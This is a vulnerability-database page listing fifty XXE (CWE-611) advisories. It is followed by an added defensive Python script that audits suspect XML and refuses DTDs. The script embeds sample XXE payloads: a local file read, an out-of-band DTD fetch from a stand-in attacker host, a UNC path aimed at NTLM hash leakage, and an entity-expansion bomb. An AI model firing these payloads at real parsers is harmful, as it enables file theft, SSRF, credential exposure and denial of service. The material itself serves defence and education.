CVEdetails.com the ultimate security vulnerability data source

Security Vulnerabilities Related To CWE-611 (Improper Restriction of XML External Entity Reference, 'XXE')

# | CVE ID | CWE ID | # of Exploits | Vulnerability Type(s) | Publish Date | Update Date | Score | Gained Access Level | Access | Complexity | Authentication | Conf. | Integ. | Avail.
(Each row is followed by the CVE description. "???" means the value is not available on the page.)
1 | CVE-2023-23595 | CWE-611 | | | 2023-01-15 | 2023-01-24 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
BlueCat Device Registration Portal 2.2 allows XXE attacks that exfiltrate single-line files. A single-line file might contain credentials, such as "machine example.com login daniel password qwerty" in the documentation example for the .netrc file format. NOTE: 2.x versions are no longer supported. There is no available information about whether any later version is affected.
2 | CVE-2023-22624 | CWE-611 | | | 2023-01-17 | 2023-01-23 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Zoho ManageEngine Exchange Reporter Plus before 5708 allows attackers to conduct XXE attacks.
3 | CVE-2022-47514 | CWE-611 | | | 2022-12-18 | 2022-12-22 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
An XML external entity (XXE) injection vulnerability in XML-RPC.NET before 2.5.0 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks, as demonstrated by a pingback.aspx POST request.
4 | CVE-2022-46827 | CWE-611 | | | 2022-12-08 | 2022-12-12 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
In JetBrains IntelliJ IDEA before 2022.3 an XXE attack leading to SSRF via requests to custom plugin repositories was possible.
5 | CVE-2022-46682 | CWE-611 | | | 2022-12-12 | 2022-12-12 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Jenkins Plot Plugin 2.1.11 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
6 | CVE-2022-45400 | CWE-611 | | | 2022-11-15 | 2022-11-20 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Jenkins JAPEX Plugin 1.7 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
7 | CVE-2022-45397 | CWE-611 | | | 2022-11-15 | 2022-11-20 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Jenkins OSF Builder Suite : : XML Linter Plugin 1.0.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
8 | CVE-2022-45396 | CWE-611 | | | 2022-11-15 | 2022-11-20 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Jenkins SourceMonitor Plugin 0.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
9 | CVE-2022-45395 | CWE-611 | | | 2022-11-15 | 2022-11-20 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Jenkins CCCC Plugin 0.6 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
10 | CVE-2022-45386 | CWE-611 | | | 2022-11-15 | 2022-11-18 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Jenkins Violations Plugin 0.7.11 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
11 | CVE-2022-45326 | CWE-611 | | | 2022-12-06 | 2022-12-08 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
An XML external entity (XXE) injection vulnerability in Kwoksys Kwok Information Server before v2.9.5.SP31 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks.
12 | CVE-2022-45194 | CWE-611 | | | 2022-11-12 | 2022-11-16 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
CBRN-Analysis before 22 allows XXE attacks via an mws XML document, leading to NTLMv2-SSP hash disclosure.
13 | CVE-2022-43689 | CWE-611 | | | 2022-11-14 | 2022-11-17 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Concrete CMS (formerly concrete5) below 8.5.10 and between 9.0.0 and 9.1.2 is vulnerable to XXE based DNS requests leading to IP disclosure.
14 | CVE-2022-43570 | CWE-611 | | | 2022-11-04 | 2022-11-08 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
In Splunk Enterprise versions below 8.1.12, 8.2.9, and 9.0.2, an authenticated user can perform an extensible markup language (XML) external entity (XXE) injection via a custom View. The XXE injection causes Splunk Web to embed incorrect documents into an error.
15 | CVE-2022-43430 | CWE-611 | | | 2022-10-19 | 2022-10-22 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Jenkins Compuware Topaz for Total Test Plugin 2.4.8 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
16 | CVE-2022-43415 | CWE-611 | | | 2022-10-19 | 2022-10-21 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Jenkins REPO Plugin 1.15.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
17 | CVE-2022-42341 | CWE-611 | | | 2022-10-14 | 2022-10-18 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction.
18 | CVE-2022-42307 | CWE-611 | | | 2022-10-03 | 2022-10-04 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
An issue was discovered in Veritas NetBackup through 10.0.0.1 and related Veritas products. The NetBackup Primary server is vulnerable to an XML External Entity (XXE) Injection attack through the DiscoveryService service.
19 | CVE-2022-42301 | CWE-611 | | | 2022-10-03 | 2022-10-04 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
An issue was discovered in Veritas NetBackup through 10.0.0.1 and related Veritas products. The NetBackup Primary server is vulnerable to an XML External Entity (XXE) injection attack through the nbars process.
20 | CVE-2022-41967 | CWE-611 | | | 2022-12-28 | 2023-01-06 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Dragonfly is a Java runtime dependency management library. Dragonfly v0.3.0-SNAPSHOT does not configure DocumentBuilderFactory to prevent XML external entity (XXE) attacks. This issue is patched in 0.3.1-SNAPSHOT. As a workaround, since Dragonfly only parses XML when `SNAPSHOT` versions are being resolved, this vulnerability may be avoided by not resolving `SNAPSHOT` versions.
21 | CVE-2022-41241 | CWE-611 | | | 2022-09-21 | 2022-09-22 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Jenkins RQM Plugin 2.8 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
22 | CVE-2022-41226 | CWE-611 | | | 2022-09-21 | 2022-09-22 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Jenkins Compuware Common Configuration Plugin 1.0.14 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
23 | CVE-2022-40771 | CWE-611 | | | 2022-11-23 | 2022-11-29 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Zoho ManageEngine ServiceDesk Plus versions 13010 and prior are vulnerable to an XML External Entity attack that leads to Information Disclosure.
24 | CVE-2022-40747 | CWE-611 | | | 2022-11-03 | 2022-11-04 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
IBM InfoSphere Information Server 11.7 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 236584.
25 | CVE-2022-40705 | CWE-611 | | | 2022-09-22 | 2022-09-24 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
** UNSUPPORTED WHEN ASSIGNED ** An Improper Restriction of XML External Entity Reference vulnerability in RPCRouterServlet of Apache SOAP allows an attacker to read arbitrary files over HTTP. This issue affects Apache SOAP version 2.2 and later versions. It is unknown whether previous versions are also affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
26 | CVE-2022-40304 | CWE-611 | | | 2022-11-23 | 2022-12-21 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
An issue was discovered in libxml2 before 2.10.3. Certain invalid XML entity definitions can corrupt a hash table key, potentially leading to subsequent logic errors. In one case, a double-free can be provoked.
27 | CVE-2022-39135 | CWE-611 | | | 2022-09-11 | 2022-11-21 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
In Apache Calcite prior to version 1.32.0 the SQL operators EXISTS_NODE, EXTRACT_XML, XML_TRANSFORM and EXTRACT_VALUE do not restrict XML External Entity references in their configuration, which makes them vulnerable to a potential XML External Entity (XXE) attack. Therefore any client exposing these operators, typically by using Oracle dialect (the first three) or MySQL dialect (the last one), is affected by this vulnerability (the extent of it will depend on the user under which the application is running). From Apache Calcite 1.32.0 onwards, Document Type Declarations and XML External Entity resolution are disabled on the impacted operators.
28 | CVE-2022-38419 | CWE-611 | | | 2022-10-14 | 2022-10-28 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction.
29 | CVE-2022-38342 | CWE-611 | | | 2022-09-13 | 2022-10-27 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Safe Software FME Server v2021.2.5, v2022.0.0.2 and below was discovered to contain an XML External Entity (XXE) vulnerability which allows authenticated attackers to perform data exfiltration or Server-Side Request Forgery (SSRF) attacks.
30 | CVE-2022-37911 | CWE-611 | | DoS | 2022-12-12 | 2022-12-13 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Due to improper restrictions on XML entities multiple vulnerabilities exist in the command line interface of ArubaOS. A successful exploit could allow an authenticated attacker to retrieve files from the local system or cause the application to consume system resources, resulting in a denial of service condition.
31 | CVE-2022-37189 | CWE-611 | | DoS | 2022-09-07 | 2022-09-10 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
DDMAL MEI2Volpiano 0.8.2 is vulnerable to XML External Entity (XXE), leading to a Denial of Service. This occurs due to the usage of the unsafe 'xml.etree' library to parse untrusted XML input.
32 | CVE-2022-36773 | CWE-611 | | | 2022-09-01 | 2022-11-03 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 233571.
33 | CVE-2022-35741 | CWE-611 | | DoS | 2022-07-18 | 2022-07-25 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Apache CloudStack version 4.5.0 and later has a SAML 2.0 authentication Service Provider plugin which is found to be vulnerable to XML external entity (XXE) injection. This plugin is not enabled by default, and an attacker would require it to be enabled in order to exploit the vulnerability. When the SAML 2.0 plugin is enabled in affected versions of Apache CloudStack, XXE vulnerabilities could potentially be exploited. The SAML 2.0 messages constructed during the authentication flow in Apache CloudStack are XML-based, and the XML data is parsed by various standard libraries that are now understood to be vulnerable to XXE injection attacks such as arbitrary file reading, possible denial of service, and server-side request forgery (SSRF) on the CloudStack management server.
34 | CVE-2022-35168 | CWE-611 | | | 2022-07-12 | 2022-07-20 | 5.0 | None | Remote | Low | Not required | None | None | Partial
Due to improper input sanitization of XML input in SAP Business One - version 10.0, an attacker can perform a denial-of-service attack rendering the system temporarily inoperative.
35 | CVE-2022-34793 | CWE-611 | | | 2022-06-30 | 2022-07-08 | 6.5 | None | Remote | Low | ??? | Partial | Partial | Partial
Jenkins Recipe Plugin 1.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
36 | CVE-2022-34348 | CWE-611 | | | 2022-09-23 | 2022-09-27 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
IBM Sterling Partner Engagement Manager 6.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 230017.
37 | CVE-2022-34001 | CWE-611 | | | 2022-07-19 | 2022-07-27 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Unit4 ERP through 7.9 allows XXE via ExecuteServerProcessAsynchronously.
38 | CVE-2022-32458 | CWE-611 | | | 2022-07-20 | 2022-09-14 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
Digiwin BPM has an XML External Entity Injection (XXE) vulnerability due to insufficient validation of user input. An unauthenticated remote attacker can perform an XML injection attack to access arbitrary system files.
39 | CVE-2022-32285 | CWE-611 | | | 2022-06-14 | 2022-06-22 | 4.3 | None | Remote | Medium | Not required | Partial | None | None
A vulnerability has been identified in Mendix SAML Module (Mendix 7 compatible) (All versions < V1.16.6), Mendix SAML Module (Mendix 8 compatible) (All versions < V2.2.2), Mendix SAML Module (Mendix 9 compatible) (All versions < V3.2.3). The affected module is vulnerable to XML External Entity (XXE) attacks due to insufficient input sanitization. This may allow an attacker to disclose confidential data under certain circumstances.
40 | CVE-2022-31775 | CWE-611 | | | 2022-08-01 | 2022-08-04 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
IBM DataPower Gateway 10.0.2.0 through 10.0.4.0, 10.0.1.0 through 10.0.1.8, 10.5.0.0, and 2018.4.1.0 through 2018.4.1.21 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 228359.
41 | CVE-2022-31678 | CWE-611 | | | 2022-10-28 | 2022-10-31 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure.
42 | CVE-2022-31471 | CWE-611 | | | 2022-07-26 | 2022-08-01 | 0.0 | None | ??? | ??? | ??? | ??? | ??? | ???
untangle is a python library to convert XML data to python objects. untangle versions 1.2.0 and earlier improperly restricts XML external entity references. By exploiting this vulnerability, a remote unauthenticated attacker may read the contents of local files.
43 | CVE-2022-31447 | CWE-611 | | | 2022-06-14 | 2022-06-27 | 5.0 | None | Remote | Low | Not required | Partial | None | None
An XML external entity (XXE) injection vulnerability in Magicpin v3.4 allows attackers to access sensitive database information via a crafted SVG file.
44 | CVE-2022-31261 | CWE-611 | | | 2022-05-24 | 2022-06-08 | 4.3 | None | Remote | Medium | Not required | Partial | None | None
An XXE issue was discovered in Morpheus through 5.2.16 and 5.4.x through 5.4.4. A successful attack requires a SAML identity provider to be configured. In order to exploit the vulnerability, the attacker must know the unique SAML callback ID of the configured identity source. A remote attacker can send a request crafted with an XXE payload to invoke a malicious DTD hosted on a system that they control. This results in reading local files that the application has access to.
45 | CVE-2022-30971 | CWE-611 | | | 2022-05-17 | 2022-05-25 | 6.5 | None | Remote | Low | ??? | Partial | Partial | Partial
Jenkins Storable Configs Plugin 1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
46 | CVE-2022-29943 | CWE-611 | | | 2022-05-04 | 2022-05-13 | 6.8 | None | Remote | Low | ??? | Complete | None | None
Talend Administration Center has a vulnerability that allows an authenticated user to use XML External Entity (XXE) processing to achieve read access as root on the remote filesystem. The issue is fixed for versions 8.0.x in TPS-5189, versions 7.3.x in TPS-5175, and versions 7.2.x in TPS-5201. Earlier versions of Talend Administration Center may also be impacted; users are encouraged to update to a supported version.
47 | CVE-2022-29801 | CWE-611 | | | 2022-05-20 | 2022-08-10 | 5.0 | None | Remote | Low | Not required | Partial | None | None
A vulnerability has been identified in Teamcenter V12.4 (All versions < V12.4.0.13), Teamcenter V13.0 (All versions < V13.0.0.9). The application contains a XML External Entity Injection (XXE) vulnerability. This could allow an attacker to view files on the application server filesystem.
48 | CVE-2022-29265 | CWE-611 | | | 2022-04-30 | 2022-05-10 | 5.0 | None | Remote | Low | Not required | Partial | None | None
Multiple components in Apache NiFi 0.0.1 to 1.16.0 do not restrict XML External Entity references in the default configuration. The Standard Content Viewer service attempts to resolve XML External Entity references when viewing formatted XML files. The following Processors attempt to resolve XML External Entity references when configured with default property values:
- EvaluateXPath
- EvaluateXQuery
- ValidateXml
Apache NiFi flow configurations that include these Processors are vulnerable to malicious XML documents that contain Document Type Declarations with XML External Entity references. The resolution disables Document Type Declarations in the default configuration for these Processors, and disallows XML External Entity resolution in standard services.
49 | CVE-2022-28890 | CWE-611 | | | 2022-05-05 | 2022-05-13 | 7.5 | None | Remote | Low | Not required | Partial | Partial | Partial
A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.
50 | CVE-2022-28219 | CWE-611 | | Exec Code | 2022-04-05 | 2022-10-26 | 7.5 | None | Remote | Low | Not required | Partial | Partial | Partial
Cewolf in Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.
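Nearly every entry above reduces to one question: what does the parser do with a DOCTYPE? The Jenkins and Dragonfly entries ("does not configure its XML parser"), the IBM entries ("expose sensitive information or consume memory resources"), the Morpheus entry (an attacker-hosted DTD), the CBRN-Analysis entry (NTLMv2 hash disclosure) and the MEI2Volpiano entry (denial of service through xml.etree) are the same defect seen from different sides. The script below is an added example and is not code from any product listed here. Using only the Python standard library, `audit_dtd` lists every DTD construct in a captured document without resolving anything (useful when triaging a suspect request body), `parse_hardened` is the corrected parser that refuses any DOCTYPE outright, and `stdlib_default_behaviour` shows what an unconfigured `xml.etree` does with the same bytes. The sample documents are constructed; `attacker.invalid` and the file paths are placeholders.

```python
# Added example (not code from any product on this page): triage and hardened parsing of
# untrusted XML with the standard library only. Sample documents are constructed;
# attacker.invalid and the file paths are placeholders.
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET

BENIGN = b'<?xml version="1.0"?><report><host>db01</host></report>'
# In-band XXE: the parser substitutes the file's contents for &xxe; (arbitrary file read).
XXE_FILE = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
            b'<r>&xxe;</r>')
# Out-of-band XXE: a parameter entity makes the parser fetch an attacker-hosted DTD (SSRF/exfil).
XXE_OOB = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % dtd SYSTEM '
           b'"http://attacker.invalid/evil.dtd"> %dtd;]><r/>')
# UNC path: a Windows resolver authenticates to the share, leaking an NTLM hash.
XXE_UNC = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "\\\\attacker.invalid\\share\\x">]>'
           b'<r>&xxe;</r>')
# Scaled-down "billion laughs": three levels of ten give 100 copies of "lol" (300 bytes).
LAUGHS = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY a "lol"><!ENTITY b "' + b'&a;' * 10
          + b'"><!ENTITY c "' + b'&b;' * 10 + b'">]><r>&c;</r>')


def classify(system_id):
    """Label what resolving a SYSTEM identifier would make the parser do."""
    s = system_id.lower()
    if s.startswith("\\\\"):
        return "UNC/SMB path: NTLM credential exposure on Windows"
    if s.startswith(("file:", "/")):
        return "local file read"
    if s.startswith(("http:", "https:", "ftp:")):
        return "network fetch: SSRF / out-of-band exfiltration"
    return "unrecognised scheme"


def audit_dtd(data):
    """Return findings for every DTD construct that could make a parser read or fetch something.

    Nothing is resolved: parameter-entity parsing stays off and external references are
    acknowledged without being fetched, so this is safe to run on a hostile sample."""
    findings = []
    p = expat.ParserCreate()
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)  # never load %pe; (expat default)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id:
            findings.append(f"external DTD {system_id} [{classify(system_id)}]")
        if has_internal_subset:
            findings.append("internal DTD subset present")

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is None:  # literal length only; nested references multiply it on expansion
            findings.append(f"internal entity {name!r} declared with {len(value)} chars (DoS amplification)")
        else:
            kind = "parameter" if is_param else "general"
            findings.append(f"external {kind} entity {name!r} -> {system_id} [{classify(system_id)}]")

    def on_external_ref(context, base, system_id, public_id):
        findings.append(f"&entity; reference to {system_id} in content (in-band disclosure)")
        return 1  # report success without parsing anything, so nothing is fetched

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.ExternalEntityRefHandler = on_external_ref
    try:
        p.Parse(data, True)
    except expat.ExpatError as exc:  # real payloads are often malformed; keep what was seen
        findings.append(f"parse error: {exc}")
    return findings


class UnsafeXML(ValueError):
    """The document uses a DTD construct this service refuses."""


def parse_hardened(data):
    """Build an ElementTree while refusing any DOCTYPE at all.

    With no DOCTYPE there are no entity declarations, so file reads, SSRF, external DTDs
    and entity-expansion DoS are all impossible, whatever the parser's other defaults are."""
    p = expat.ParserCreate()
    builder = ET.TreeBuilder()

    def refuse(*_):
        raise UnsafeXML("DOCTYPE/DTD is not permitted in untrusted input")

    p.StartDoctypeDeclHandler = refuse
    p.EntityDeclHandler = refuse  # defence in depth; unreachable once the DOCTYPE is refused
    p.ExternalEntityRefHandler = refuse
    p.StartElementHandler = builder.start
    p.EndElementHandler = builder.end
    p.CharacterDataHandler = builder.data
    p.Parse(data, True)
    return builder.close()


def is_accepted(data):
    """True if parse_hardened takes the document, False if it refuses the DTD."""
    try:
        parse_hardened(data)
    except UnsafeXML:
        return False
    return True


def stdlib_default_behaviour(data):
    """What an unconfigured xml.etree does with the same bytes."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return f"ParseError: {exc}"
    return f"parsed; text length {len(root.text or '')}"


if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("file", XXE_FILE), ("oob", XXE_OOB), ("unc", XXE_UNC), ("laughs", LAUGHS)]:
        print(f"== {label}: default etree -> {stdlib_default_behaviour(doc)}; hardened accepts: {is_accepted(doc)}")
        for finding in audit_dtd(doc):
            print("   ", finding)
```

Refusing the DOCTYPE is the same control the Java fixes in this list apply (the JAXP feature `http://apache.org/xml/features/disallow-doctype-decl` on `DocumentBuilderFactory` and friends); if a service genuinely needs a DTD, the fallback is to disable external general entities, external parameter entities and external DTD loading, and to keep parameter-entity parsing off. Two caveats the output makes visible: `xml.etree` with defaults does refuse the external entity (it raises `ParseError` rather than reading the file) but expands internal entities in full, which is the denial-of-service shape behind the MEI2Volpiano entry; and Expat 2.4.1 and later cap entity amplification only once the expanded output exceeds a multi-megabyte threshold, so a small sample like the one above still expands completely and older Expat builds have no cap at all.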
Total number of vulnerabilities: 799 (this is page 1 of 16)